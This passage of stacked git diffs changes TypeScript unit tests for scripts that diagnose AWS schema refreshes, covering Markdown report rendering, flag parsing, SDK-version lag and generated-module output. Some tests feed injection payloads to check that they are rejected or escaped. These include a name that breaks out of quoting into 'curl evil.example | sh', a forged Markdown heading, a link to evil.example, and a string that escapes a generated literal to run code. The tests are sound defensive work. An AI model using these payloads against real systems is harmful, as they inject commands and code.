+      'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.\n' +
+        '  AWS::ECS::Service: someKey [case-divergence]\n'
+    );
+    expect(out.divergences).toHaveLength(1);
+    expect(out.unparsedFailure).toBe(false);
+  });
+
+  it('pins its failure pattern against the checker that produces the text', () => {
+    // Nothing else joins the two files. A reword in `gen-nested-key-coverage.ts`
+    // would make the pattern inert, and an inert pattern renders a failing
+    // check as "additions only" — the silent-clean verdict this job exists to
+    // prevent.
+    const producer = readFileSync(
+      join(REPO_ROOT, 'scripts/gen-nested-key-coverage.ts'),
+      'utf8'
+    );
+    const announcements = [...producer.matchAll(/nested-key-coverage: (?:FAIL|failed)/g)].map(
+      (m) => m[0]
+    );
+    expect(announcements.length, 'the checker no longer announces failure this way').toBeGreaterThanOrEqual(5);
+    for (const announcement of new Set(announcements)) {
+      expect(NESTED_KEY_FAILURE_RE.test(announcement), `unmatched: ${announcement}`).toBe(true);
     }
   });
 });
@@ -146,6 +182,25 @@ describe('parseDeclaredProperties', () => {
     expect(() => parseDeclaredProperties('export const X = 1;\n')).toThrow(
       /parsed to zero types/
     );
+  });
+
+  it('REFUSES a module whose declaration shape it no longer recognises', () => {
+    // The guard that shipped compared `declared.size` against `boundaries.length`,
+    // and `declared.set` runs once per boundary — so it could only ever fire on
+    // a DUPLICATE type name. Measured against the real module: renaming the
+    // member emptied all 134 sets with no refusal at all, which filters every
+    // removal away and renders "nothing needs a decision" over a red check.
+    const mutated = readFileSync(REAL_GENERATED, 'utf8').replaceAll('handled:', 'handledProps:');
+    expect(() => parseDeclaredProperties(mutated)).toThrow(/recognised the declaration shape/);
+  });
+
+  it('accepts a type declaring NOTHING, which is not the same as an unread one', () => {
+    // `new Set<string>()` has no `[`, so it matches neither the populated shape
+    // nor a naive "did we extract names" test. Counting it as unrecognised
+    // would refuse the real module outright.
+    const declared = parseDeclaredProperties(readFileSync(REAL_GENERATED, 'utf8'));
+    const empties = [...declared.values()].filter((set) => set.size === 0).length;
+    expect(empties, 'no empty-set entry left — this case no longer covers that shape').toBeGreaterThan(0);
   });
 
   it('returns an empty map for genuinely empty input, without throwing', () => {
@@ -202,16 +257,24 @@ describe('findDeclarationCandidates', () => {
     // 17 provider files serve more than one type; `ec2-provider.ts` serves 15.
     // Unscoped, asking about `Tags` on one Glue type returned every `'Tags'` in
     // the file, including other Glue types' declarations.
-    // A NON-EMPTY scoped answer, and the sibling type's line explicitly
-    // excluded. The earlier form compared lengths, and the scoped answer was
-    // `[]` — so `0 < 18` passed trivially and deleting the block's END bound
-    // left it green.
+    // The PROPERTY is what makes this discriminate, and two rounds picked one
+    // that could not. `ConnectionInput` occurs only inside this type's own
+    // block, so scoped, unscoped and file-wide were the same answer and BOTH
+    // window bounds could be deleted with every case still green (measured).
+    // `Name` occurs before the block, inside it, and after it, so deleting the
+    // START bound and deleting the END bound each fail a different assertion
+    // below.
     const type = 'AWS::Glue::Connection';
     const file = 'src/provisioning/providers/glue-provider.ts';
-    const scoped = findDeclarationCandidates('ConnectionInput', file, type, REPO_ROOT);
-    const unscoped = findDeclarationCandidates('ConnectionInput', file, undefined, REPO_ROOT);
+    const scoped = findDeclarationCandidates('Name', file, type, REPO_ROOT);
+    const unscoped = findDeclarationCandidates('Name', file, undefined, REPO_ROOT);
     expect(scoped.length, 'the type block yielded nothing — scoping window is wrong').toBeGreaterThan(0);
-    expect(unscoped.length).toBeGreaterThanOrEqual(scoped.length);
+    // Strictly wider, not merely no narrower: an equal count means the property
+    // is confined to the block and the case cannot see a missing bound at all.
+    expect(
+      unscoped.length,
+      'unscoped == scoped — this property cannot discriminate; pick one that occurs outside the block'
+    ).toBeGreaterThan(scoped.length);
     // Every scoped hit must sit inside the block, i.e. at or after the type's
     // own literal — deleting the window's END makes this fail on a later type.
     const lines = readFileSync(join(REPO_ROOT, file), 'utf8').split('\n');
@@ -431,12 +494,38 @@ describe('renderDiagnosis', () => {
           renameCandidates: { Id: ['RepositoryId'] },
         },
       ],
+      writableAdded: [
+        { resourceType: 'AWS::CodeCommit::Repository', properties: ['RepositoryId'] },
+      ],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('Possibly a RENAME');
+    expect(md).toContain('RepositoryId');
+  });
+
+  it('does NOT call a READ-ONLY addition a rename, whatever the caller passed', () => {
+    // A declaration cannot be pointed at a read-only property, so this advice
+    // cannot be followed. The caller filters to writable additions and that
+    // filter had NO pin: swapping its argument for the unfiltered list left
+    // every case green. Re-checked in the renderer, where both sides are in
+    // hand, the class is closed whatever the caller passes.
+    const md = renderDiagnosis({
+      removed: [
+        {
+          resourceType: 'AWS::CodeCommit::Repository',
+          properties: ['Id'],
+          candidates: { Id: ['src/provisioning/providers/codecommit-repository-provider.ts:10'] },
+          renameCandidates: { Id: ['RepositoryId'] },
+        },
+      ],
+      // `RepositoryId` arrived READ-ONLY: absent from writableAdded entirely.
       writableAdded: [],
       divergences: [],
       skipped: [],
     });
-    expect(md).toContain('Likely a RENAME');
-    expect(md).toContain('RepositoryId');
+    expect(md).not.toContain('Possibly a RENAME');
+    expect(md).not.toContain('RepositoryId');
   });
 
   it('does NOT claim a rename when the refresh added nothing to that type', () => {
@@ -446,7 +535,7 @@ describe('renderDiagnosis', () => {
       divergences: [],
       skipped: [],
     });
-    expect(md).not.toContain('Likely a RENAME');
+    expect(md).not.toContain('a RENAME');
   });
 
   it('carries the installed SDK version, since "not modelled" is only as current as it', () => {
@@ -466,11 +555,7 @@ describe('renderDiagnosis', () => {
       removed: [removedEntry],
       writableAdded: [],
       divergences: [
-        {
-          resourceType: 'AWS::Glue::Connection',
-          bucket: 'definition-member-missing',
-          line: 'AWS::Glue::Connection: X [definition-member-missing] (…)',
-        },
+        { resourceType: 'AWS::Glue::Connection', nestedKey: 'SomeKey', bucket: 'definition-member-missing', detail: '' },
       ],
       skipped: [],
     });
@@ -487,16 +572,18 @@ describe('renderDiagnosis', () => {
       removed: [],
       writableAdded: [],
       divergences: [
-        { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member', line: 'x [no-sdk-member]' },
+        { resourceType: 'AWS::Glue::Connection', nestedKey: 'SomeKey', bucket: 'no-sdk-member', detail: '' },
       ],
       skipped: [],
-      sdkLag: {
-        client: '@aws-sdk/client-glue',
-        resourceType: 'AWS::Glue::Connection',
-        installed: '3.9.0',
-        latest: '3.9.0',
-        behind: false,
-      },
+      sdkLag: [
+        {
+          client: '@aws-sdk/client-glue',
+          resourceType: 'AWS::Glue::Connection',
+          installed: '3.9.0',
+          latest: '3.9.0',
+          behind: false,
+        },
+      ],
     });
     expect(md).toContain('is current');
     expect(md).toContain('ruled out');
@@ -510,16 +597,18 @@ describe('renderDiagnosis', () => {
       removed: [],
       writableAdded: [],
       divergences: [
-        { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member', line: 'x [no-sdk-member]' },
+        { resourceType: 'AWS::Glue::Connection', nestedKey: 'SomeKey', bucket: 'no-sdk-member', detail: '' },
       ],
       skipped: [],
-      sdkLag: {
-        client: '@aws-sdk/client-glue',
-        resourceType: 'AWS::Glue::Connection',
-        installed: '3.1018.0',
-        latest: '3.1127.0',
-        behind: true,
-      },
+      sdkLag: [
+        {
+          client: '@aws-sdk/client-glue',
+          resourceType: 'AWS::Glue::Connection',
+          installed: '3.1018.0',
+          latest: '3.1127.0',
+          behind: true,
+        },
+      ],
     });
     expect(md).toContain('3.1018.0');
     expect(md).toContain('3.1127.0');
@@ -534,7 +623,7 @@ describe('renderDiagnosis', () => {
       removed: [],
       writableAdded: [],
       divergences: [
-        { resourceType: 'AWS::ECS::Service', bucket: 'case-divergence', line: 'AWS::ECS::Service: x [case-divergence]' },
+        { resourceType: 'AWS::ECS::Service', nestedKey: 'SomeKey', bucket: 'case-divergence', detail: '' },
       ],
       skipped: [],
     });
@@ -577,20 +666,25 @@ describe('renderDiagnosis', () => {
     }
   });
 
-  it('lists divergences verbatim and names both options', () => {
+  it('renders every divergence field, and names both options', () => {
     const md = renderDiagnosis({
       removed: [],
       writableAdded: [],
       divergences: [
         {
           resourceType: 'AWS::Glue::Connection',
+          nestedKey: 'OAuth2Properties.OAuth2Credentials',
           bucket: 'definition-member-missing',
-          line: 'AWS::Glue::Connection: OAuth2Credentials [definition-member-missing] (…)',
+          detail: 'SDK interface `OAuth2Properties` has no member',
         },
       ],
       skipped: [],
     });
-    expect(md).toContain('OAuth2Credentials');
+    expect(md).toContain('AWS::Glue::Connection');
+    expect(md).toContain('OAuth2Properties.OAuth2Credentials');
+    expect(md).toContain('definition-member-missing');
+    // The detail survives, minus the characters that could end the line early.
+    expect(md).toContain('has no member');
     expect(md).toContain('NESTED_KEY_ALLOW_LIST');
     expect(md).toContain('installed');
   });
@@ -604,5 +698,215 @@ describe('renderDiagnosis', () => {
     });
     expect(md).toContain('AWS::BedrockAgentCore::Browser');
     expect(md).toContain('Not refreshed');
+  });
+});
+
+describe('the render guards, at every site that reaches Markdown', () => {
+  // The guard existed and was enforced at ONE of five call sites: reverting the
+  // other four to raw interpolation left every case green. This drives one
+  // diagnosis carrying a hostile name in EVERY name-bearing position and counts
+  // the rejections, so a reverted site is a failing count rather than a case
+  // nobody wrote.
+  const POISON = 'Foo`\n\n## Nothing in this refresh needs a decision';
+
+  it('rejects a hostile name in every position a bundle-derived name reaches', () => {
+    const md = renderDiagnosis({
+      removed: [
+        {
+          resourceType: 'AWS::Glue::Connection',
+          properties: [POISON],
+          candidates: { [POISON]: [] },
+          renameCandidates: { [POISON]: [POISON] },
+          providerPath: 'src/provisioning/providers/glue-provider.ts',
+        },
+      ],
+      writableAdded: [{ resourceType: 'AWS::Glue::Connection', properties: [POISON] }],
+      divergences: [
+        {
+          resourceType: 'AWS::Glue::Connection',
+          nestedKey: POISON,
+          bucket: 'no-sdk-member',
+          detail: '',
+        },
+      ],
+      skipped: [POISON],
+    });
+    // The removal bullet, the rename bullet, the writable-added bullet, the
+    // divergence line and the skipped list: five sites, five rejections.
+    const rejections = (md.match(/\[(?:name|key) rejected: unexpected characters\]/g) ?? []).length;
+    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(5);
+    // And the forged heading never renders as one.
+    expect(md).not.toMatch(/^## Nothing in this refresh needs a decision$/m);
+  });
+
+  it('keeps a hostile name out of the paste-able shell command', () => {
+    // These go inside single quotes in a bash block the runbook tells the
+    // maintainer to paste, so a `'` is command injection in their own terminal
+    // rather than a broken Markdown span.
+    const md = renderDiagnosis({
+      removed: [
+        {
+          resourceType: "AWS::X::Y'; curl evil.example | sh; echo '",
+          properties: ["Name'; curl evil.example | sh; echo '"],
+          candidates: {},
+        },
+      ],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).not.toContain('curl evil.example');
+    expect(md).toContain('NAME_REJECTED_UNEXPECTED_CHARACTERS');
+  });
+
+  it('renderKey admits a real nested path and refuses a span-breaking one', () => {
+    expect(renderKey('DistributionConfig.Origins.Items.CustomHeaders')).toBe(
+      '`DistributionConfig.Origins.Items.CustomHeaders`'
+    );
+    expect(renderKey('#top')).toBe('`#top`');
+    expect(renderKey('Foo`bar')).toContain('rejected');
+    expect(renderKey('Foo [x](https://evil.example)')).toContain('rejected');
+  });
+
+  it('renderLiteral admits a real name and refuses a quote', () => {
+    expect(renderLiteral('AWS::Glue::Connection')).toBe('AWS::Glue::Connection');
+    expect(renderLiteral("a'b")).toBe('NAME_REJECTED_UNEXPECTED_CHARACTERS');
+  });
+
+  it('renderDetail strips what could end the line, and keeps the prose', () => {
+    expect(renderDetail('SDK has `OAuth2Properties`, but the provider never writes it')).toBe(
+      'SDK has OAuth2Properties, but the provider never writes it'
+    );
+    expect(renderDetail('x\n## Forged')).not.toContain('\n');
+  });
+});
+
+describe('the unparsed-failure verdict', () => {
+  it('never renders "additions only" over a checker that said it failed', () => {
+    // Both wrong answers shipped: throwing discarded the whole diagnosis,
+    // returning [] rendered the refresh as clean. The third answer is a section
+    // naming what happened, and the clean verdict suppressed.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [{ resourceType: 'AWS::S3::Bucket', properties: ['NewThing'] }],
+      divergences: [],
+      nestedKeyUnparsed: true,
+      skipped: [],
+    });
+    expect(md).not.toContain('additions only');
+    expect(md).toContain('FAILED in a mode this report cannot read');
+    expect(md).toContain('audit:nested-key-coverage:check');
+    // The rest of the report is still rendered — that is the whole point of not
+    // throwing.
+    expect(md).toContain('NewThing');
+  });
+
+  it('renders the clean verdict when the checker did NOT fail', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      nestedKeyUnparsed: false,
+      skipped: [],
+    });
+    expect(md).toContain('additions only');
+  });
+});
+
+describe('sdkClientVersions', () => {
+  it('pairs each client with ITS OWN installed version', () => {
+    // The lag question has no member to look up, and asking `sdkModelsMember`
+    // with a name that matches nothing answered with the provider's FIRST
+    // import — right only by coincidence.
+    const rows = sdkClientVersions(
+      'src/provisioning/providers/route53-provider.ts',
+      REPO_ROOT
+    );
+    expect(rows.length).toBeGreaterThan(0);
+    for (const { client, version } of rows) {
+      expect(client).toMatch(/^@aws-sdk\/client-/);
+      const onDisk = JSON.parse(
+        readFileSync(join(REPO_ROOT, 'node_modules', client, 'package.json'), 'utf8')
+      ).version;
+      expect(version, `${client} paired with another client's version`).toBe(onDisk);
+    }
+  });
+
+  it('returns nothing rather than guessing when the provider is unknown', () => {
+    expect(sdkClientVersions(undefined, REPO_ROOT)).toEqual([]);
+  });
+});
+
+describe('the SDK-lag section', () => {
+  const divergence = {
+    resourceType: 'AWS::Glue::Connection',
+    nestedKey: 'OAuth2Properties.X',
+    bucket: 'no-sdk-member',
+    detail: '',
+  };
+
+  it('scopes every lag row to the type it was computed for', () => {
+    // A single line covering "the first divergent type" read as a verdict over
+    // divergences it never looked at.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [divergence, { ...divergence, resourceType: 'AWS::ECS::Service' }],
+      skipped: [],
+      sdkLag: [
+        {
+          resourceType: 'AWS::Glue::Connection',
+          client: '@aws-sdk/client-glue',
+          installed: '3.9.0',
+          latest: '3.9.0',
+          behind: false,
+        },
+      ],
+    });
+    expect(md).toContain('AWS::Glue::Connection');
+    expect(md).toContain('ruled out here');
+    // The type with NO row must not read as covered by the one that has it.
+    expect(md).toContain('UNKNOWN, not ruled out');
+  });
+
+  it('rejects a version string that is not one', () => {
+    // The anchor is the whole guard: without `$`, `npm view` output carrying a
+    // trailing line would be reported as the published version.
+    expect(sdkVersionLag('@aws-sdk/client-glue', '3.9.0', () => '3.9.1')).toEqual({
+      installed: '3.9.0',
+      latest: '3.9.1',
+      behind: true,
+    });
+    expect(sdkVersionLag('@aws-sdk/client-glue', '3.9.0', () => '3.9.1\nnpm WARN x')).toBeUndefined();
+    expect(sdkVersionLag('@aws-sdk/client-glue', '3.9.0', () => 'not-a-version')).toBeUndefined();
+  });
+});
+
+describe('clientsForType', () => {
+  const rows = [
+    { client: '@aws-sdk/client-sts', version: '3.0.0' },
+    { client: '@aws-sdk/client-glue', version: '3.1.0' },
+  ];
+
+  it('drops the clients a provider imports that do not serve the type', () => {
+    // Live-observed: a Glue key divergence reported `@aws-sdk/client-sts` as
+    // lagging, which is true and says nothing about the finding. Most providers
+    // import STS.
+    expect(clientsForType('AWS::Glue::Connection', rows)).toEqual([
+      { client: '@aws-sdk/client-glue', version: '3.1.0' },
+    ]);
+  });
+
+  it('matches a service whose client name drops the separators', () => {
+    const apigw = [{ client: '@aws-sdk/client-apigatewayv2', version: '3.1.0' }];
+    expect(clientsForType('AWS::ApiGatewayV2::Stage', apigw)).toEqual(apigw);
+  });
+
+  it('falls back to EVERY row rather than to none when nothing matches', () => {
+    // An empty answer renders as an absent type, which the section calls
+    // "UNKNOWN, not ruled out" — but silently narrowing to nothing would hide a
+    // real lag behind a naming mismatch. Widening is the safe direction.
+    expect(clientsForType('AWS::Made::Up', rows)).toEqual(rows);
+    expect(clientsForType('', rows)).toEqual(rows);
   });
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1990,17 +1990,17 @@ describe('collectFixtureDeltas', () => {
   });
 });
 
-describe('the module\u2019s own doc comments', () => {
-  it('has no JSDoc block orphaned from its declaration', () => {
-    // Inserting a helper directly above a documented function detaches that
-    // function's docblock and silently re-points it at the new one. It happened
-    // three times in one session — twice caught by `--checkJs` reporting an
-    // implicit-any on a parameter that now had no `@param`, once only by
-    // review. A block followed by another block, or by a blank line, documents
-    // nothing.
-    const src = readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8');
+describe('the module’s own doc comments', () => {
+  /**
+   * The orphan predicate, extracted so it can be driven with SHAPES rather than
+   * only pointed at the real file. Pointed only at the file, the rule this
+   * round widened — a one-line type annotation ATTACHES — had no case at all:
+   * the probe that exercises it restores a shape the fence now accepts, so it
+   * is green either way.
+   */
+  const orphansIn = (src: string): string[] => {
     const lines = src.split('\n');
-    const orphans: string[] = [];
+    const found: string[] = [];
     let blockStart = -1;
     let seenBlocks = 0;
     for (let i = 0; i < lines.length; i++) {
@@ -2008,35 +2008,57 @@ describe('the module\u2019s own doc comments', () => {
       if (lines[i] !== ' */') continue;
       seenBlocks += 1;
       const body = lines.slice(blockStart, i).join('\n');
-      // The FILE header documents the module, and a `@typedef`-only block
-      // documents types rather than a declaration — neither attaches to
-      // anything and both are correct as they are.
+      // The FILE header documents the module and a `@typedef`-only block
+      // documents types; neither attaches to a declaration.
       const attaches = seenBlocks > 1 && !/@typedef/.test(body);
-      const next = lines[i + 1] ?? '';
-      // A docblock must be followed by a DECLARATION — which also catches a
-      // block followed by a stray comment or by non-declaration code, not only
-      // the blank-line and stacked-block shapes.
-      //
-      // BOUND, stated because an over-claimed fence is the thing this file
-      // keeps producing: it CANNOT see an undocumented declaration slipped
-      // BETWEEN a docblock and the function it describes. That shape still
-      // reads as "block, then a declaration", and telling the intended subject
-      // from an interloper needs more than the next line — a JSDoc block does
-      // not name what it documents. `tsc --checkJs` is the real control there
-      // (it caught two of this session's three orphan incidents through an
-      // implicit-any on a parameter that had lost its `@param`); this fence
-      // covers the shapes that produce no type error at all.
-      const declares = /^(export\s+)?(async\s+)?(function|class|const|let|var)\s/.test(
-        next.trim()
-      );
-      if (attaches && !declares) {
-        orphans.push(`line ${i + 2}: ${JSON.stringify(next)}`);
-      }
+      const nextLine = (lines[i + 1] ?? '').trim();
+      const declares =
+        /^(export\s+)?(export\s+default\s+)?(async\s+)?(function|class|const|let|var)\s/.test(
+          nextLine
+        ) || /^\/\*\*.*\*\/$/.test(nextLine);
+      if (attaches && !declares) found.push(`line ${i + 2}: ${JSON.stringify(nextLine)}`);
     }
-    expect(orphans, 'a docblock is not attached to a declaration').toEqual([]);
-    // And the file really does carry docblocks — otherwise this passes on a
-    // file it never parsed.
-    expect(lines.filter((l) => l === ' */').length).toBeGreaterThan(20);
+    return found;
+  };
+
+  const withHeader = (tail: string) => ['/**', ' * header', ' */', '', tail].join('\n');
+
+  it('flags a block followed by a blank line, another block, or a comment', () => {
+    expect(orphansIn(withHeader('/**\n * doc\n */\n\nexport function f() {}'))).toHaveLength(1);
+    expect(
+      orphansIn(withHeader('/**\n * a\n */\n/**\n * b\n */\nexport function f() {}'))
+    ).toHaveLength(1);
+    expect(orphansIn(withHeader('/**\n * doc\n */\n// stray\nexport function f() {}'))).toHaveLength(
+      1
+    );
+  });
+
+  it('accepts every shape that really does attach', () => {
+    // The one-line type annotation is the ordinary JSDoc way to type a `const`.
+    // The first cut flagged it, so the module was edited to suit the fence
+    // rather than the other way round.
+    for (const tail of [
+      '/**\n * doc\n */\nexport function f() {}',
+      '/**\n * doc\n */\nfunction f() {}',
+      '/**\n * doc\n */\nexport const x = 1;',
+      '/**\n * doc\n */\nexport default function f() {}',
+      '/**\n * doc\n */\n/** @type {string} */\nexport const x = "a";',
+      '/**\n * @typedef {A} B\n */\n\nconst unrelated = 1;',
+    ]) {
+      expect(orphansIn(withHeader(tail)), `flagged an attached shape: ${tail}`).toEqual([]);
+    }
+  });
+
+  it('finds none in the real module', () => {
+    // BOUND, stated because an over-claimed fence is what this file keeps
+    // finding: it cannot see an undocumented declaration slipped BETWEEN a
+    // docblock and its function — that still reads as "block, then a
+    // declaration". Nothing else covers that shape either: `checkJs` appears in
+    // NO tsconfig and NO workflow here, so the runs that caught two of this
+    // session's orphan incidents were by hand, not a control.
+    const src = readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8');
+    expect(orphansIn(src), 'a docblock is not attached to a declaration').toEqual([]);
+    expect(src.split('\n').filter((l) => l === ' */').length).toBeGreaterThan(20);
   });
 });
 
@@ -2103,21 +2125,33 @@ describe('assertFixtureFloor', () => {
     expect(() => assertFixtureFloor(3, 134)).toThrow(/far short of the coverage table/);
   });
 
-  it('is CALLED by main(), before the walk it guards', () => {
-    // The function is exercised directly above; the CALL SITE lives in `main()`
-    // and no seam reaches it — `FIXTURES_DIR` is derived from the repo root, so
-    // a spawn cannot be pointed at an empty directory. A source-shape
-    // assertion is the honest cover: it catches deletion, and says plainly
-    // that it does not exercise the behaviour.
-    const src = readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8');
-    const floorAt = src.indexOf('assertFixtureFloor(fixtureFiles.length');
-    // The CALL, not the definition — `collectFixtureDeltas({` matches the
-    // function's own signature first, which sits far earlier in the file.
-    const walkAt = src.indexOf('} = collectFixtureDeltas({');
-    expect(floorAt, 'main() no longer calls the floor').toBeGreaterThan(-1);
-    expect(walkAt).toBeGreaterThan(-1);
-    expect(floorAt, 'the floor is checked after the walk it guards').toBeLessThan(walkAt);
-  });
+  it('is reached by the real run — an empty fixtures dir refuses end to end', () => {
+    // Replaces a source-shape assertion that claimed "no seam reaches this
+    // call site". That was false, and the assertion could not see the call
+    // wrapped in `try {} catch {}` — which measured as printing the exact
+    // clean verdict the floor exists to prevent. `--fixtures-dir=` makes the
+    // real path testable.
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-empty-fixtures-'));
+    try {
+      let out = '';
+      try {
+        out = execFileSync(
+          'node',
+          [
+            join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'),
+            `--fixtures-dir=${dir}`,
+          ],
+          { encoding: 'utf8' }
+        );
+      } catch (e) {
+        out = String((e as { stdout?: unknown }).stdout ?? '');
+      }
+      expect(out).toContain('no schema fixtures found');
+      expect(out).not.toContain('Nothing in this refresh needs a decision');
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }, 60_000);
 
   it('accepts the real tree, and does not fire when the table is empty', () => {
     // Bound to the DECLARED count rather than a constant: the two move
@@ -2129,8 +2163,9 @@ describe('assertFixtureFloor', () => {
     const declared = loadDeclaredProperties();
     expect(files.length).toBeGreaterThan(100);
     expect(() => assertFixtureFloor(files.length, declared.size)).not.toThrow();
-    // A by-hand run against an unread coverage table must not trip the ratio.
-    expect(() => assertFixtureFloor(1, 0)).not.toThrow();
+    // (`assertFixtureFloor(1, 0)` was asserted here and could not fail:
+    // `1 * 2 < 0` is false whatever the guard does. The dead `declaredCount > 0`
+    // conjunct it was written for is gone.)
   });
 });
 
@@ -2156,4 +2191,42 @@ describe('the sibling type declarations', () => {
     expect(`${out.stdout}${out.stderr}`.trim(), 'the declarations do not type-check').toBe('');
     expect(out.status).toBe(0);
   }, 120_000);
+});
+
+describe('the generated-module renderers', () => {
+  it('escapes a name that would otherwise close the literal', async () => {
+    // The fix had NO test: reverting both renderers to hand-quoting left 3041
+    // cases green. A property name comes from AWS's public bundle, and this
+    // module is executed by the refresh workflow, by the bot PR's own CI, and
+    // shipped to npm — so a name closing the literal is code execution, not a
+    // broken file.
+    const { renderHandled, renderSilentDrop } = await import(
+      '../../../scripts/gen-property-coverage.ts'
+    );
+    const hostile = "zzz', (globalThis.OWNED = 1)] // ";
+
+    const handled = renderHandled([hostile]);
+    expect(handled, 'the name closed its own literal').not.toContain("'zzz',");
+    expect(handled).toContain(JSON.stringify(hostile));
+
+    const drops = renderSilentDrop([[hostile, 'because']]);
+    expect(drops).not.toContain("['zzz',");
+    expect(drops).toContain(JSON.stringify(hostile));
+
+    // And the emitted text still PARSES as the expression it claims to be —
+    // escaping that produced invalid TypeScript would fail the build instead.
+    expect(() => new Function(`return ${handled}`)).not.toThrow();
+    expect(() => new Function(`return ${drops}`)).not.toThrow();
+  });
+
+  it('emits DOUBLE quotes, which the formatter normalises back', async () => {
+    // The committed module is regenerated in CI and diffed byte-for-byte, so
+    // the quote change `JSON.stringify` introduces must be undone by `vp run
+    // format` (`singleQuote: true`) — which the workflow and the CI staleness
+    // guard both run before diffing. Asserting the raw emission keeps that
+    // dependency visible instead of implicit.
+    const { renderHandled } = await import('../../../scripts/gen-property-coverage.ts');
+    expect(renderHandled(['Alpha'])).toContain('"Alpha"');
+    expect(renderHandled(['Alpha'])).not.toContain("'Alpha'");
+  });
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1584,7 +1584,7 @@ describe('the script end to end', () => {
     expect(glued).not.toContain('Nothing in this refresh needs a decision');
   }, 60_000);
 
-  it('refuses a SINGLE-dash flag consumed as a value', () => {
+  it('refuses a SINGLE-dash token where a value was expected', () => {
     // The guard covered `--x` only, while the workflow comment eight lines from
     // it warns about exactly the single-dash spelling (`-props`). This
     // fabricated a failed check rendered as `#### \`-property-coverage\``.
@@ -1649,14 +1649,23 @@ describe('the script end to end', () => {
   it('refuses an unrecognised flag instead of rendering a clean verdict', () => {
     // Every reader's absent-flag arm is the permissive one, so a typo, a
     // retired flag and a single-dash spelling all rendered as clean.
-    for (const bad of ['--property-coverage-rc', '--failed-check', '-failed-checks']) {
+    // A dash-LESS token too: the first guard tested `startsWith('-')`, so
+    // `failed-checks property-coverage` — one spelling over from
+    // `-failed-checks` — fell through to the permissive arms and rendered the
+    // clean verdict. This script takes no positionals at all.
+    for (const bad of [
+      '--property-coverage-rc',
+      '--failed-check',
+      '-failed-checks',
+      'failed-checks',
+    ]) {
       const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [bad, 'x']);
       expect(md, `accepted ${bad}`).toContain('unrecognized flag');
       expect(md).not.toContain('Nothing in this refresh needs a decision');
     }
   }, 60_000);
 
-  it('accepts every flag it documents, in both spellings', () => {
+  it('accepts the documented flags in both the space and glued spellings', () => {
     // The inverse: a guard that refused a REAL flag would be caught here
     // rather than in the workflow.
     const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
@@ -1932,7 +1941,15 @@ describe('the script\u2019s own synopsis', () => {
     // check, the verdict six rounds went into closing, reached through the
     // documentation. Both directions, so a new flag cannot ship undocumented
     // and a retired one cannot linger.
-    const documented = [...header.matchAll(/`?(--[a-z][a-z-]*)`?/g)].map((m) => m[1]!);
+    // The SYNOPSIS, not the whole docblock: matching across the header let a
+    // flag survive in prose while being dropped from the invocation, which is
+    // the half a reader copies — and the assertion message said "synopsis".
+    const lines = header.split('\n').map((l) => l.replace(/^\s*\*\s?/, ''));
+    const start = lines.findIndex((l) => l.includes('node scripts/diagnose-schema-refresh.mjs'));
+    expect(start, 'the synopsis no longer shows the invocation').toBeGreaterThan(-1);
+    const synopsis: string[] = [];
+    for (let i = start; i < lines.length && lines[i]!.trim() !== ''; i++) synopsis.push(lines[i]!);
+    const documented = [...synopsis.join('\n').matchAll(/(--[a-z][a-z-]*)/g)].map((m) => m[1]!);
     expect(new Set(documented), 'the synopsis and the accepted set disagree').toEqual(
       new Set(KNOWN_FLAGS)
     );
@@ -1948,8 +1965,15 @@ describe('the script\u2019s own synopsis', () => {
     for (let i = start; i < lines.length; i++) {
       const body = lines[i]!.replace(/^\s*\*\s?/, '');
       if (body.trim() === '') break;
-      const continues = body.endsWith('\\');
-      if (continues) {
+      const isLast = i + 1 >= lines.length || lines[i + 1]!.replace(/^\s*\*\s?/, '').trim() === '';
+      if (isLast) {
+        expect(body.endsWith('\\'), `the last synopsis line dangles a continuation`).toBe(false);
+      } else {
+        // Exactly one. A DOUBLED backslash terminates the command and passes a
+        // literal `\`; a MISSING one ends the command early. The first fence
+        // covered only the doubled spelling — the same one-spelling shape it
+        // was written to catch.
+        expect(body.endsWith('\\'), `line ${i + 1} does not continue`).toBe(true);
         expect(body.endsWith('\\\\'), `line ${i + 1} ends in a DOUBLED backslash`).toBe(false);
       }
     }

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1570,6 +1570,42 @@ describe('the script end to end', () => {
     expect(md).not.toContain('no guidance');
   }, 60_000);
 
+  it('reads the --flag=value spelling too, in every reader', () => {
+    // `args.indexOf(flag)` returns -1 for the glued form, so a mistyped
+    // invocation fell through to each reader's ABSENT arm: `''` for the log
+    // readers and 0 — "the checker succeeded" — for the status one. Only the
+    // workflow's space form held it shut, and the fence for that accepted
+    // `--skipped-log=...` as well.
+    const glued = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks=property-coverage',
+    ]);
+    expect(glued).toContain('property-coverage');
+    expect(glued).not.toContain('Nothing in this refresh needs a decision');
+  }, 60_000);
+
+  it('refuses a SINGLE-dash flag consumed as a value', () => {
+    // The guard covered `--x` only, while the workflow comment eight lines from
+    // it warns about exactly the single-dash spelling (`-props`). This
+    // fabricated a failed check rendered as `#### \`-property-coverage\``.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks',
+      '-property-coverage',
+    ]);
